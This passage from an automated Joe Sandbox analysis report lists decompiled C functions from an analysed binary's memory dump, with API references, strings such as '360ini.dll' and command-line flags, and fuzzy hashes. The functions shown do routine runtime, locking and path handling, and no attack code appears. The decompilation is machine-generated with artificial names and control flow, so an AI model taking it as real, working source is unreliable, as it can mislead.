					 *(_t30 - 4) = 0xfffffffe;
					E00D01CB9();
				} else {
					_t33 =  *((intOrPtr*)(_t29 + 0x6c));
					if( *((intOrPtr*)(_t29 + 0x6c)) == 0) {
						goto L6;
					} else {
						_t29 =  *((intOrPtr*)(E00D10D0C(_t22, _t33) + 0x6c));
					}
				}
				if(_t29 == 0) {
					E00D03357(_t25, 0x20);
				}
				return E00D00A01(_t29);
			}









                                                                                                                                                                                          0x00d01c4f
                                                                                                                                                                                          0x00d01c4f
                                                                                                                                                                                          0x00d01c4f
                                                                                                                                                                                          0x00d01c4f
                                                                                                                                                                                          0x00d01c4f
                                                                                                                                                                                          0x00d01c51
                                                                                                                                                                                          0x00d01c56
                                                                                                                                                                                          0x00d01c60
                                                                                                                                                                                          0x00d01c62
                                                                                                                                                                                          0x00d01c6a
                                                                                                                                                                                          0x00d01c8e
                                                                                                                                                                                          0x00d01c90
                                                                                                                                                                                          0x00d01c96
                                                                                                                                                                                          0x00d01c9a
                                                                                                                                                                                          0x00d01c9d
                                                                                                                                                                                          0x00d01ca8
                                                                                                                                                                                          0x00d01cab
                                                                                                                                                                                          0x00d01cb2
                                                                                                                                                                                          0x00d01c6c
                                                                                                                                                                                          0x00d01c6c
                                                                                                                                                                                          0x00d01c70
                                                                                                                                                                                          0x00000000
                                                                                                                                                                                          0x00d01c72
                                                                                                                                                                                          0x00d01c77
                                                                                                                                                                                          0x00d01c77
                                                                                                                                                                                          0x00d01c70
                                                                                                                                                                                          0x00d01c7c
                                                                                                                                                                                          0x00d01c80
                                                                                                                                                                                          0x00d01c85
                                                                                                                                                                                          0x00d01c8d

                                                                                                                                                                                          APIs
                                                                                                                                                                                          • __getptd.LIBCMT ref: 00D01C5B
                                                                                                                                                                                            • Part of subcall function 00D10D0C: __getptd_noexit.LIBCMT ref: 00D10D0F
                                                                                                                                                                                            • Part of subcall function 00D10D0C: __amsg_exit.LIBCMT ref: 00D10D1C
                                                                                                                                                                                          • __getptd.LIBCMT ref: 00D01C72
                                                                                                                                                                                          • __amsg_exit.LIBCMT ref: 00D01C80
                                                                                                                                                                                          • __lock.LIBCMT ref: 00D01C90
                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                          • Source File: 00000001.00000002.537362630.0000000000C81000.00000020.00000001.01000000.00000004.sdmp, Offset: 00C80000, based on PE: true
                                                                                                                                                                                          • Associated: 00000001.00000002.537326906.0000000000C80000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                                                                          • Associated: 00000001.00000002.537675953.0000000000D3A000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                                                                          • Associated: 00000001.00000002.537750623.0000000000D5D000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                                                                          • Associated: 00000001.00000002.537775522.0000000000D5E000.00000008.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                                                                          • Associated: 00000001.00000002.537801127.0000000000D60000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                                                                          • Associated: 00000001.00000002.537839655.0000000000D65000.00000008.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                                                                          • Associated: 00000001.00000002.537865172.0000000000D66000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                                                                          • Associated: 00000001.00000002.537894031.0000000000D6B000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                                                                          • Associated: 00000001.00000002.538818588.0000000000FA8000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                          • Snapshot File: hcaresult_1_2_c80000_UNK_.jbxd
                                                                                                                                                                                          Similarity
                                                                                                                                                                                          • API ID: __amsg_exit__getptd$__getptd_noexit__lock
                                                                                                                                                                                          • String ID:
                                                                                                                                                                                          • API String ID: 3521780317-0
                                                                                                                                                                                          • Opcode ID: 0ced06e050619d870dd9e8698d92ef1b0c0fbe5885eacd393f2acbdadcce5f52
                                                                                                                                                                                          • Instruction ID: 7cf0abdc5d9e08bdd8b6a176ff2b5d71e6a96bf958292533036c725f8a50d313
                                                                                                                                                                                          • Opcode Fuzzy Hash: 0ced06e050619d870dd9e8698d92ef1b0c0fbe5885eacd393f2acbdadcce5f52
                                                                                                                                                                                          • Instruction Fuzzy Hash: BCF0B436A80704ABE720FBB4E442B4DB7A0EF00720F184209E84C976D2CFB4E940DB79
                                                                                                                                                                                          Uniqueness

                                                                                                                                                                                          Uniqueness Score: -1.00%

                                                                                                                                                                                          Function 00C9AC71 Relevance: 6.0, APIs: 4, Instructions: 26threadCOMMON
                                                                                                                                                                                          Download Yara Rule
                                                                                                                                                                                          C-Code - Quality: 92%
                                                                                                                                                                                          			E00C9AC71(void* __ebx, void* __ecx, void* __edi, void* __esi, void* __eflags) {
				void* _t14;
				void* _t23;
				intOrPtr _t26;
				struct _CRITICAL_SECTION* _t27;
				void* _t28;

				_push(0xc);
				E00D0155A(0xd2ff73, __ebx, __edi, __esi);
				_t23 = __ecx;
				_t26 =  *0xd68dfc; // 0xd6652c
				_t27 = _t26 + 0x10;
				 *(_t28 - 0x18) = _t27;
				_t2 = _t28 - 4;
				 *(_t28 - 4) =  *(_t28 - 4) & 0x00000000;
				EnterCriticalSection(_t27);
				 *((char*)(_t28 - 0x14)) = 1;
				 *((intOrPtr*)(_t28 - 0x10)) = GetCurrentThreadId();
				_t14 = E00C9AA58( *((intOrPtr*)(_t23 + 0x34)),  *_t2, _t28 - 0x10);
				LeaveCriticalSection(_t27);
				 *((char*)(_t28 - 0x14)) = 0;
				E00C98492(_t14, _t28 - 0x18);
				return E00D01632(_t14);
			}








                                                                                                                                                                                          0x00c9ac71
                                                                                                                                                                                          0x00c9ac78
                                                                                                                                                                                          0x00c9ac7d
                                                                                                                                                                                          0x00c9ac7f
                                                                                                                                                                                          0x00c9ac85
                                                                                                                                                                                          0x00c9ac88
                                                                                                                                                                                          0x00c9ac8b
                                                                                                                                                                                          0x00c9ac8b
                                                                                                                                                                                          0x00c9ac90
                                                                                                                                                                                          0x00c9ac96
                                                                                                                                                                                          0x00c9aca3
                                                                                                                                                                                          0x00c9acaa
                                                                                                                                                                                          0x00c9acb2
                                                                                                                                                                                          0x00c9acbb
                                                                                                                                                                                          0x00c9acbf
                                                                                                                                                                                          0x00c9accb

                                                                                                                                                                                          APIs
                                                                                                                                                                                          • __EH_prolog3.LIBCMT ref: 00C9AC78
                                                                                                                                                                                          • EnterCriticalSection.KERNEL32(00D6651C,0000000C), ref: 00C9AC90
                                                                                                                                                                                          • GetCurrentThreadId.KERNEL32 ref: 00C9AC9A
                                                                                                                                                                                          • LeaveCriticalSection.KERNEL32(00D6651C), ref: 00C9ACB2
                                                                                                                                                                                            • Part of subcall function 00C98492: LeaveCriticalSection.KERNEL32 ref: 00C9849D
                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                          • Source File: 00000001.00000002.537362630.0000000000C81000.00000020.00000001.01000000.00000004.sdmp, Offset: 00C80000, based on PE: true
                                                                                                                                                                                          • Associated: 00000001.00000002.537326906.0000000000C80000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                                                                          • Associated: 00000001.00000002.537675953.0000000000D3A000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                                                                          • Associated: 00000001.00000002.537750623.0000000000D5D000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                                                                          • Associated: 00000001.00000002.537775522.0000000000D5E000.00000008.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                                                                          • Associated: 00000001.00000002.537801127.0000000000D60000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                                                                          • Associated: 00000001.00000002.537839655.0000000000D65000.00000008.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                                                                          • Associated: 00000001.00000002.537865172.0000000000D66000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                                                                          • Associated: 00000001.00000002.537894031.0000000000D6B000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                                                                          • Associated: 00000001.00000002.538818588.0000000000FA8000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                          • Snapshot File: hcaresult_1_2_c80000_UNK_.jbxd
                                                                                                                                                                                          Similarity
                                                                                                                                                                                          • API ID: CriticalSection$Leave$CurrentEnterH_prolog3Thread
                                                                                                                                                                                          • String ID:
                                                                                                                                                                                          • API String ID: 1540708785-0
                                                                                                                                                                                          • Opcode ID: 2c010daf0a53f8936fcfc2aa9bda29a9e9b47d1ef6f89c449f844c5e20f8d439
                                                                                                                                                                                          • Instruction ID: 1ddc647906ee20525e787823822c7862609f2804c7b930e41b9988d560f62024
                                                                                                                                                                                          • Opcode Fuzzy Hash: 2c010daf0a53f8936fcfc2aa9bda29a9e9b47d1ef6f89c449f844c5e20f8d439
                                                                                                                                                                                          • Instruction Fuzzy Hash: 2CF0B8349003268BDB00EBE8CD087EE7BB0FF05315F040418E085A3382CB749A059BF6
                                                                                                                                                                                          Uniqueness

                                                                                                                                                                                          Uniqueness Score: -1.00%

                                                                                                                                                                                          Function 00CE76C7 Relevance: 5.3, APIs: 1, Strings: 2, Instructions: 95COMMON
                                                                                                                                                                                          Download Yara Rule
                                                                                                                                                                                          C-Code - Quality: 87%
                                                                                                                                                                                          			E00CE76C7(void* __ebx, void* __ecx, void* __edx, void* __edi, void* __esi, void* __eflags) {
				signed int _t38;
				signed int _t39;
				signed int _t41;
				signed int _t45;
				void* _t51;
				signed int _t56;
				void* _t61;
				void* _t65;
				void* _t92;

				_t86 = __edx;
				_push(8);
				E00D0155A(0xd37485, __ebx, __edi, __esi);
				_t65 = __ecx;
				_t90 = __ecx + 0xc;
				if( *((intOrPtr*)( *(__ecx + 0xc) - 8)) != 0) {
					_t38 = E00C981DD(_t90, L"/FROM:", 0);
					_t88 = " ";
					__eflags = _t38;
					if(_t38 > 0) {
						E00C9B6E5(_t92 - 0x10, __edx, _t92,  *_t90 + 0xc + _t38 * 2);
						 *(_t92 - 4) =  *(_t92 - 4) & 0x00000000;
						_t56 = E00C981DD(_t92 - 0x10, " ", 0);
						__eflags = _t56;
						if(__eflags <= 0) {
							E00C9CCC5(__ecx + 8, _t92, _t92 - 0x10);
						} else {
							_push(_t56);
							_push(_t92 - 0x14);
							_t61 = E00C9B7A4(__ecx, _t92 - 0x10, " ", _t90, __eflags);
							 *(_t92 - 4) = 1;
							E00C9CCC5(__ecx + 8, _t92, _t61);
							E00C9820F(_t92 - 0x14);
						}
						_t17 = _t92 - 4;
						 *_t17 =  *(_t92 - 4) | 0xffffffff;
						__eflags =  *_t17;
						E00C9820F(_t92 - 0x10);
					}
					_t39 = E00C981DD(_t90, L" /DIR:", 0);
					__eflags = _t39;
					if(_t39 > 0) {
						E00C9B6E5(_t92 - 0x10, _t86, _t92,  *_t90 + 0xc + _t39 * 2);
						 *(_t92 - 4) = 2;
						_t45 = E00C981DD(_t92 - 0x10, _t88, 0);
						__eflags = _t45;
						if(__eflags <= 0) {
							_t91 = _t65 + 4;
							E00C9CCC5(_t65 + 4, _t92, _t92 - 0x10);
						} else {
							_push(_t45);
							_push(_t92 - 0x14);
							_t51 = E00C9B7A4(_t65, _t92 - 0x10, _t88, _t90, __eflags);
							_t91 = _t65 + 4;
							 *(_t92 - 4) = 3;
							E00C9CCC5(_t65 + 4, _t92, _t51);
							 *(_t92 - 4) = 2;
							E00C9820F(_t92 - 0x14);
						}
						E00CB1602(_t91, _t86, "|", 0xd47270);
						E00C9820F(_t92 - 0x10);
					}
					_t41 = 1;
					__eflags = 1;
				} else {
					_t41 = 0;
				}
				return E00D01632(_t41);
			}












                                                                                                                                                                                          0x00ce76c7
                                                                                                                                                                                          0x00ce76c7
                                                                                                                                                                                          0x00ce76ce
                                                                                                                                                                                          0x00ce76d3
                                                                                                                                                                                          0x00ce76d5
                                                                                                                                                                                          0x00ce76de
                                                                                                                                                                                          0x00ce76f0
                                                                                                                                                                                          0x00ce76f5
                                                                                                                                                                                          0x00ce76fa
                                                                                                                                                                                          0x00ce76fc
                                                                                                                                                                                          0x00ce7708
                                                                                                                                                                                          0x00ce770d
                                                                                                                                                                                          0x00ce7717
                                                                                                                                                                                          0x00ce771c
                                                                                                                                                                                          0x00ce771e
                                                                                                                                                                                          0x00ce774b
                                                                                                                                                                                          0x00ce7720
                                                                                                                                                                                          0x00ce7720
                                                                                                                                                                                          0x00ce7724
                                                                                                                                                                                          0x00ce7728
                                                                                                                                                                                          0x00ce7731
                                                                                                                                                                                          0x00ce7735
                                                                                                                                                                                          0x00ce773d
                                                                                                                                                                                          0x00ce773d
                                                                                                                                                                                          0x00ce7750
                                                                                                                                                                                          0x00ce7750
                                                                                                                                                                                          0x00ce7750
                                                                                                                                                                                          0x00ce7757
                                                                                                                                                                                          0x00ce7757
                                                                                                                                                                                          0x00ce7765
                                                                                                                                                                                          0x00ce776a
                                                                                                                                                                                          0x00ce776c
                                                                                                                                                                                          0x00ce7778
                                                                                                                                                                                          0x00ce7783
                                                                                                                                                                                          0x00ce778a
                                                                                                                                                                                          0x00ce778f
                                                                                                                                                                                          0x00ce7791
                                                                                                                                                                                          0x00ce77c0
                                                                                                                                                                                          0x00ce77c6
                                                                                                                                                                                          0x00ce7793
                                                                                                                                                                                          0x00ce7793
                                                                                                                                                                                          0x00ce7797
                                                                                                                                                                                          0x00ce779b
                                                                                                                                                                                          0x00ce77a0
                                                                                                                                                                                          0x00ce77a6
                                                                                                                                                                                          0x00ce77aa
                                                                                                                                                                                          0x00ce77b2
                                                                                                                                                                                          0x00ce77b6
                                                                                                                                                                                          0x00ce77b6
                                                                                                                                                                                          0x00ce77d7
                                                                                                                                                                                          0x00ce77df
                                                                                                                                                                                          0x00ce77df
                                                                                                                                                                                          0x00ce77e6
                                                                                                                                                                                          0x00ce77e6
                                                                                                                                                                                          0x00ce76e0
                                                                                                                                                                                          0x00ce76e0
                                                                                                                                                                                          0x00ce76e0
                                                                                                                                                                                          0x00ce77ec

                                                                                                                                                                                          APIs
                                                                                                                                                                                          Strings
                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                          • Source File: 00000001.00000002.537362630.0000000000C81000.00000020.00000001.01000000.00000004.sdmp, Offset: 00C80000, based on PE: true
                                                                                                                                                                                          • Associated: 00000001.00000002.537326906.0000000000C80000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                                                                          • Associated: 00000001.00000002.537675953.0000000000D3A000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                                                                          • Associated: 00000001.00000002.537750623.0000000000D5D000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                                                                          • Associated: 00000001.00000002.537775522.0000000000D5E000.00000008.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                                                                          • Associated: 00000001.00000002.537801127.0000000000D60000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                                                                          • Associated: 00000001.00000002.537839655.0000000000D65000.00000008.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                                                                          • Associated: 00000001.00000002.537865172.0000000000D66000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                                                                          • Associated: 00000001.00000002.537894031.0000000000D6B000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                                                                          • Associated: 00000001.00000002.538818588.0000000000FA8000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                          • Snapshot File: hcaresult_1_2_c80000_UNK_.jbxd
                                                                                                                                                                                          Similarity
                                                                                                                                                                                          • API ID: H_prolog3
                                                                                                                                                                                          • String ID: /DIR:$/FROM:
                                                                                                                                                                                          • API String ID: 431132790-429574935
                                                                                                                                                                                          • Opcode ID: a1e686d674a8b58a218d2f50b66e539511dc8fe56649780cefc86304878edf31
                                                                                                                                                                                          • Instruction ID: 7078f0d451cc0489a70b9604d84142dcb24465db2936e922b67b2dad228aa3f4
                                                                                                                                                                                          • Opcode Fuzzy Hash: a1e686d674a8b58a218d2f50b66e539511dc8fe56649780cefc86304878edf31
                                                                                                                                                                                          • Instruction Fuzzy Hash: 81318D32600159ABCF15EBA4CD9ABEEB378AF10300F10455DB826B71D2DF70AB09E760
                                                                                                                                                                                          Uniqueness

                                                                                                                                                                                          Uniqueness Score: -1.00%

                                                                                                                                                                                          Function 00C8A800 Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 84COMMON
                                                                                                                                                                                          Download Yara Rule
                                                                                                                                                                                          C-Code - Quality: 61%
                                                                                                                                                                                          			E00C8A800(intOrPtr _a4, intOrPtr _a8, intOrPtr* _a12) {
				signed int _v4;
				signed int _v8;
				void* _v524;
				char _v528;
				void* __ebx;
				void* __edi;
				void* __esi;
				signed int _t16;
				signed int _t18;
				void* _t20;
				signed int* _t23;
				intOrPtr* _t25;
				signed int* _t26;
				void* _t28;
				signed int _t32;
				void* _t34;
				intOrPtr _t40;
				signed int _t41;
				intOrPtr _t43;
				intOrPtr _t44;
				signed int _t46;

				_t46 =  &_v524;
				_t16 =  *0xd64070; // 0x8a9e1774
				_v4 = _t16 ^ _t46;
				_t25 = _a12;
				_t26 =  &_v524;
				_t18 = 0;
				_t44 = 0x104;
				_t43 = _a4 - _t26;
				while(1) {
					_t5 = _t44 + 0x7ffffefa; // 0x7ffffffe
					if(_t5 == 0) {
						break;
					}
					_t41 =  *(_t43 + _t26) & 0x0000ffff;
					if(_t41 == 0) {
						break;
					}
					 *_t26 = _t41;
					_t26 =  &(_t26[0]);
					_t44 = _t44 - 1;
					if(_t44 != 0) {
						continue;
					}
					L6:
					_t26 = _t26 - 2;
					L7:
					_t38 = 0;
					 *_t26 = 0;
					_t28 = _a8 - 0x11;
					if(_t28 == 0) {
						_t20 = E00D00DF1(0,  *_t25, L"360ini.dll");
						_t46 = _t46 + 8;
						if(_t20 != 0) {
							_push( *_t25);
							_push( &_v524);
						} else {
							_push(L"360ini.dll");
							_push( &_v524);
						}
						PathAppendW();
						_t23 = _t25 + 0x12;
						_t40 = 0x104;
						_t44 =  &_v528 - _t23;
						while(1) {
							_t12 = _t40 + 0x7ffffefa; // 0x7ffffffe
							if(_t12 == 0) {
								break;
							}
							_t32 =  *(_t44 + _t23) & 0x0000ffff;
							if(_t32 == 0) {
								break;
							}
							 *_t23 = _t32;
							_t23 =  &(_t23[0]);
							_t40 = _t40 - 1;
							if(_t40 != 0) {
								continue;
							}
							L20:
							_t23 = _t23 - 2;
							L21:
							_t38 = 0;
							 *_t23 = 0;
							_t14 = _t38 + 1; // 0x1
							_t18 = _t14;
							L22:
							return E00D0071A(_t18, _t25, _v8 ^ _t46, _t38, _t43, _t44);
						}
						if(_t40 != 0) {
							goto L21;
						}
						goto L20;
					}
					_t34 = _t28 - 1;
					if(_t34 == 0 || _t34 == 1) {
						_t18 = 0;
					}
					goto L22;
				}
				if(_t44 != 0) {
					goto L7;
				}
				goto L6;
			}
























                                                                                                                                                                                          0x00c8a800
                                                                                                                                                                                          0x00c8a806
                                                                                                                                                                                          0x00c8a80d
                                                                                                                                                                                          0x00c8a815
                                                                                                                                                                                          0x00c8a825
                                                                                                                                                                                          0x00c8a82b
                                                                                                                                                                                          0x00c8a82d
                                                                                                                                                                                          0x00c8a832
                                                                                                                                                                                          0x00c8a834
                                                                                                                                                                                          0x00c8a834
                                                                                                                                                                                          0x00c8a83c
                                                                                                                                                                                          0x00000000
                                                                                                                                                                                          0x00000000
                                                                                                                                                                                          0x00c8a83e
                                                                                                                                                                                          0x00c8a845
                                                                                                                                                                                          0x00000000
                                                                                                                                                                                          0x00000000
                                                                                                                                                                                          0x00c8a847
                                                                                                                                                                                          0x00c8a84a
                                                                                                                                                                                          0x00c8a84d
                                                                                                                                                                                          0x00c8a850
                                                                                                                                                                                          0x00000000
                                                                                                                                                                                          0x00000000
                                                                                                                                                                                          0x00c8a858
                                                                                                                                                                                          0x00c8a858
                                                                                                                                                                                          0x00c8a85b
                                                                                                                                                                                          0x00c8a85b
                                                                                                                                                                                          0x00c8a85d
                                                                                                                                                                                          0x00c8a867
                                                                                                                                                                                          0x00c8a86a
                                                                                                                                                                                          0x00c8a882
                                                                                                                                                                                          0x00c8a887
                                                                                                                                                                                          0x00c8a88c
                                                                                                                                                                                          0x00c8a89c
                                                                                                                                                                                          0x00c8a8a1
                                                                                                                                                                                          0x00c8a88e
                                                                                                                                                                                          0x00c8a88e
                                                                                                                                                                                          0x00c8a897
                                                                                                                                                                                          0x00c8a897
                                                                                                                                                                                          0x00c8a8a2
                                                                                                                                                                                          0x00c8a8a8
                                                                                                                                                                                          0x00c8a8af
                                                                                                                                                                                          0x00c8a8b4
                                                                                                                                                                                          0x00c8a8b6
                                                                                                                                                                                          0x00c8a8b6
                                                                                                                                                                                          0x00c8a8be
                                                                                                                                                                                          0x00000000
                                                                                                                                                                                          0x00000000
                                                                                                                                                                                          0x00c8a8c0
                                                                                                                                                                                          0x00c8a8c7
                                                                                                                                                                                          0x00000000
                                                                                                                                                                                          0x00000000
                                                                                                                                                                                          0x00c8a8c9
                                                                                                                                                                                          0x00c8a8cc
                                                                                                                                                                                          0x00c8a8cf
                                                                                                                                                                                          0x00c8a8d2
                                                                                                                                                                                          0x00000000
                                                                                                                                                                                          0x00000000
                                                                                                                                                                                          0x00c8a8da
                                                                                                                                                                                          0x00c8a8da
                                                                                                                                                                                          0x00c8a8dd
                                                                                                                                                                                          0x00c8a8dd
                                                                                                                                                                                          0x00c8a8df
                                                                                                                                                                                          0x00c8a8e2
                                                                                                                                                                                          0x00c8a8e2
                                                                                                                                                                                          0x00c8a8e5
                                                                                                                                                                                          0x00c8a8fc
                                                                                                                                                                                          0x00c8a8fc
                                                                                                                                                                                          0x00c8a8d8
                                                                                                                                                                                          0x00000000
                                                                                                                                                                                          0x00000000
                                                                                                                                                                                          0x00000000
                                                                                                                                                                                          0x00c8a8d8
                                                                                                                                                                                          0x00c8a86c
                                                                                                                                                                                          0x00c8a86f
                                                                                                                                                                                          0x00c8a876
                                                                                                                                                                                          0x00c8a876
                                                                                                                                                                                          0x00000000
                                                                                                                                                                                          0x00c8a86f
                                                                                                                                                                                          0x00c8a856
                                                                                                                                                                                          0x00000000
                                                                                                                                                                                          0x00000000
                                                                                                                                                                                          0x00000000

                                                                                                                                                                                          APIs
                                                                                                                                                                                          Strings
                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                          • Source File: 00000001.00000002.537362630.0000000000C81000.00000020.00000001.01000000.00000004.sdmp, Offset: 00C80000, based on PE: true
                                                                                                                                                                                          • Associated: 00000001.00000002.537326906.0000000000C80000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                                                                          • Associated: 00000001.00000002.537675953.0000000000D3A000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                                                                          • Associated: 00000001.00000002.537750623.0000000000D5D000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                                                                          • Associated: 00000001.00000002.537775522.0000000000D5E000.00000008.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                                                                          • Associated: 00000001.00000002.537801127.0000000000D60000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                                                                          • Associated: 00000001.00000002.537839655.0000000000D65000.00000008.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                                                                          • Associated: 00000001.00000002.537865172.0000000000D66000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                                                                          • Associated: 00000001.00000002.537894031.0000000000D6B000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                                                                          • Associated: 00000001.00000002.538818588.0000000000FA8000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                          • Snapshot File: hcaresult_1_2_c80000_UNK_.jbxd
                                                                                                                                                                                          Similarity
                                                                                                                                                                                          • API ID: AppendPath__wcsicoll
                                                                                                                                                                                          • String ID: 360ini.dll
                                                                                                                                                                                          • API String ID: 2263677653-2183494497
                                                                                                                                                                                          • Opcode ID: a58fb9217c132570bfb5b0c92b21e9628db2273e92706512043e9a823aa039e2
                                                                                                                                                                                          • Instruction ID: 191550d4cb7d3e450cfd4ac1b759fbef825727b66797e0b57e1db129c4056a53
                                                                                                                                                                                          • Opcode Fuzzy Hash: a58fb9217c132570bfb5b0c92b21e9628db2273e92706512043e9a823aa039e2
                                                                                                                                                                                          • Instruction Fuzzy Hash: 61213A32A042019BE728EF39C544677B3A5FFA4304F14862ED86687684F7749A06C777
                                                                                                                                                                                          Uniqueness

                                                                                                                                                                                          Uniqueness Score: -1.00%

                                                                                                                                                                                          Function 00C91570 Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 69COMMON
                                                                                                                                                                                          Download Yara Rule
                                                                                                                                                                                          APIs
                                                                                                                                                                                          • _memcpy_s.LIBCMT ref: 00C915AE
                                                                                                                                                                                          • _memcpy_s.LIBCMT ref: 00C915C3
                                                                                                                                                                                            • Part of subcall function 00C8DF10: __CxxThrowException@8.LIBCMT ref: 00C8DF22
                                                                                                                                                                                          Strings
                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                          • Source File: 00000001.00000002.537362630.0000000000C81000.00000020.00000001.01000000.00000004.sdmp, Offset: 00C80000, based on PE: true
                                                                                                                                                                                          • Associated: 00000001.00000002.537326906.0000000000C80000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                                                                          • Associated: 00000001.00000002.537675953.0000000000D3A000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                                                                          • Associated: 00000001.00000002.537750623.0000000000D5D000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                                                                          • Associated: 00000001.00000002.537775522.0000000000D5E000.00000008.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                                                                          • Associated: 00000001.00000002.537801127.0000000000D60000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                                                                          • Associated: 00000001.00000002.537839655.0000000000D65000.00000008.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                                                                          • Associated: 00000001.00000002.537865172.0000000000D66000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                                                                          • Associated: 00000001.00000002.537894031.0000000000D6B000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                                                                          • Associated: 00000001.00000002.538818588.0000000000FA8000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                          • Snapshot File: hcaresult_1_2_c80000_UNK_.jbxd
                                                                                                                                                                                          Similarity
                                                                                                                                                                                          • API ID: _memcpy_s$Exception@8Throw
                                                                                                                                                                                          • String ID: eeeeeeee
                                                                                                                                                                                          • API String ID: 93487992-1257926895
                                                                                                                                                                                          • Opcode ID: eec0b3bf87d4a15a30ebbd1068f59a1fc501b969206aa054f77529ef7aa894f4
                                                                                                                                                                                          • Instruction ID: 704b92747db863d27b63779503ef0ab2d55cafdd795c4558e48945649a149513
                                                                                                                                                                                          • Opcode Fuzzy Hash: eec0b3bf87d4a15a30ebbd1068f59a1fc501b969206aa054f77529ef7aa894f4
                                                                                                                                                                                          • Instruction Fuzzy Hash: CF013972600205AFCB109B6DCC49A5EB7E9EF84354B458519F90E9B256DA30A9419BA0
                                                                                                                                                                                          Uniqueness

                                                                                                                                                                                          Uniqueness Score: -1.00%

                                                                                                                                                                                          Function 00C9D3D9 Relevance: 5.3, APIs: 1, Strings: 2, Instructions: 36COMMON
                                                                                                                                                                                          Download Yara Rule
                                                                                                                                                                                          C-Code - Quality: 77%
                                                                                                                                                                                          			E00C9D3D9(void* __ebx, void* __ecx, void* __edi, void* __esi, void* __eflags) {
				intOrPtr _t16;
				void* _t21;
				intOrPtr _t29;
				void* _t35;

				_push(8);
				E00D0155A(0xd3046c, __ebx, __edi, __esi);
				 *((intOrPtr*)(_t35 - 0x14)) = 0;
				_t34 = __ecx + 8;
				_t29 =  *(__ecx + 8);
				 *(_t35 - 4) = 0;
				_t39 =  *((intOrPtr*)(_t29 - 8));
				if( *((intOrPtr*)(_t29 - 8)) == 0) {
					_push(L"themes");
					_push(_t35 - 0x10);
					_t21 = E00C9D274(__ebx, __ecx, 1, _t34, _t39);
					 *(_t35 - 4) = 1;
					E00C9CCC5(_t34, _t35, _t21);
					E00C9820F(_t35 - 0x10);
				}
				_t25 =  *((intOrPtr*)(_t35 + 8));
				_t16 =  *0xd5d01c; // 0xd5d014
				 *((intOrPtr*)( *((intOrPtr*)(_t35 + 8)))) = _t16;
				_push( *((intOrPtr*)(_t35 + 0xc)));
				 *(_t35 - 4) =  *(_t35 - 4) & 0x00000000;
				 *((intOrPtr*)(_t35 - 0x14)) = 1;
				E00C9D261( *((intOrPtr*)(_t35 + 8)), L"%s\\%s",  *_t34);
				return E00D01632(_t25);
			}







                                                                                                                                                                                          0x00c9d3d9
                                                                                                                                                                                          0x00c9d3e0
                                                                                                                                                                                          0x00c9d3e7
                                                                                                                                                                                          0x00c9d3ea
                                                                                                                                                                                          0x00c9d3ed
                                                                                                                                                                                          0x00c9d3f2
                                                                                                                                                                                          0x00c9d3f5
                                                                                                                                                                                          0x00c9d3f8
                                                                                                                                                                                          0x00c9d3fa
                                                                                                                                                                                          0x00c9d402
                                                                                                                                                                                          0x00c9d403
                                                                                                                                                                                          0x00c9d40b
                                                                                                                                                                                          0x00c9d40e
                                                                                                                                                                                          0x00c9d416
                                                                                                                                                                                          0x00c9d416
                                                                                                                                                                                          0x00c9d41b
                                                                                                                                                                                          0x00c9d41e
                                                                                                                                                                                          0x00c9d423
                                                                                                                                                                                          0x00c9d425
